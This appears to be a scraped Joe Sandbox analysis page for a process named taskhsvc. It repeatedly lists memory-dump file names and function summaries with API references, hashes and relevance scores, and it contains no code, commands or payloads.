Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abort
String ID:
API String ID: 1190921433-0
Opcode ID: e727508c7cc874fc9df29ac359c1d9f3b3a3ff64721d1d7b1dfb2a121f5796fd
Instruction ID: fec2b41b57a2b179d737e2d5342405bd7a59c580b935db5c9a21b8f8cc9790e6
Opcode Fuzzy Hash: e727508c7cc874fc9df29ac359c1d9f3b3a3ff64721d1d7b1dfb2a121f5796fd
Instruction Fuzzy Hash: 3C6191B4A093498FCB04EFA9C18469EBFF0BF48314F14996EE898AB345D7349945CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00E90435 Relevance: 3.1, APIs: 2, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00E9032C: __stack_chk_fail.LIBSSP-0 ref: 00E9042E

Part of subcall function 00EE5B2B: CreateFileA.KERNEL32 ref: 00EE5BEF
Part of subcall function 00EE5B2B: free.MSVCRT ref: 00EE5E9E

free.MSVCRT ref: 00E9059D
__stack_chk_fail.LIBSSP-0 ref: 00E905F7

Part of subcall function 00EE9B70: free.MSVCRT ref: 00EE9BA5
Part of subcall function 00EE9B70: free.MSVCRT ref: 00EE9BC7
Part of subcall function 00EE9B70: __stack_chk_fail.LIBSSP-0 ref: 00EE9BE1

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: free$__stack_chk_fail$CreateFile
String ID:
API String ID: 698054786-0
Opcode ID: 22de4672e9007826c8385b6e6cefcfd9e255aa932b524ba23e1b46dd198fb06b
Instruction ID: 3f48c212e5b1ae08eb39b86ce7bf2840315a3fb31d3e8760b06e2f4ce96e3fac
Opcode Fuzzy Hash: 22de4672e9007826c8385b6e6cefcfd9e255aa932b524ba23e1b46dd198fb06b
Instruction Fuzzy Hash: 85516DB4A047098FCB10DFA9C188B9DBBF0BF48314F159919E898AB355D774E98ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 00DAC97F Relevance: 3.1, APIs: 2, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00DF3659: __stack_chk_fail.LIBSSP-0 ref: 00DF36FF

free.MSVCRT ref: 00DACB5D
__stack_chk_fail.LIBSSP-0 ref: 00DACB92

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: 98f288d85c9cee9eeea72e3f3b49125ec667da44aa1cfaa05b56ab7eeae47c08
Instruction ID: 714e27b30d3aefd8776bbe1692846779eba07ca458f4f00df2b180ae9a434a7c
Opcode Fuzzy Hash: 98f288d85c9cee9eeea72e3f3b49125ec667da44aa1cfaa05b56ab7eeae47c08
Instruction Fuzzy Hash: 6551C3B4A18306CFCB04DF69C585A6EBBF1BF49310F158819E888A7351D774DA44DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2523 Relevance: 3.1, APIs: 2, Instructions: 113stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EFFC04: exit.MSVCRT ref: 00EFFC72
Part of subcall function 00EFFC04: __stack_chk_fail.LIBSSP-0 ref: 00EFFD09

strftime.MSVCRT ref: 00EE2608
__stack_chk_fail.LIBSSP-0 ref: 00EE266E

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$exitstrftime
String ID:
API String ID: 4214909442-0
Opcode ID: 80247967e5c8717731e642decde87aedd706def6ceeb5a7ba2a72a8537cd4c4c
Instruction ID: fd0edc36ae2f5059b5524983a4203dbfa984edcdfc00ba0b9d8ac2b93e3a1c59
Opcode Fuzzy Hash: 80247967e5c8717731e642decde87aedd706def6ceeb5a7ba2a72a8537cd4c4c
Instruction Fuzzy Hash: B9411B75E052089FCB08DFADD98059DBBF6FF88300F14892EE949EB354E670A9458F41

Uniqueness

Uniqueness Score: -1.00%

Function 00DB622D Relevance: 3.1, APIs: 2, Instructions: 108COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB62DE
__stack_chk_fail.LIBSSP-0 ref: 00DB6395

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
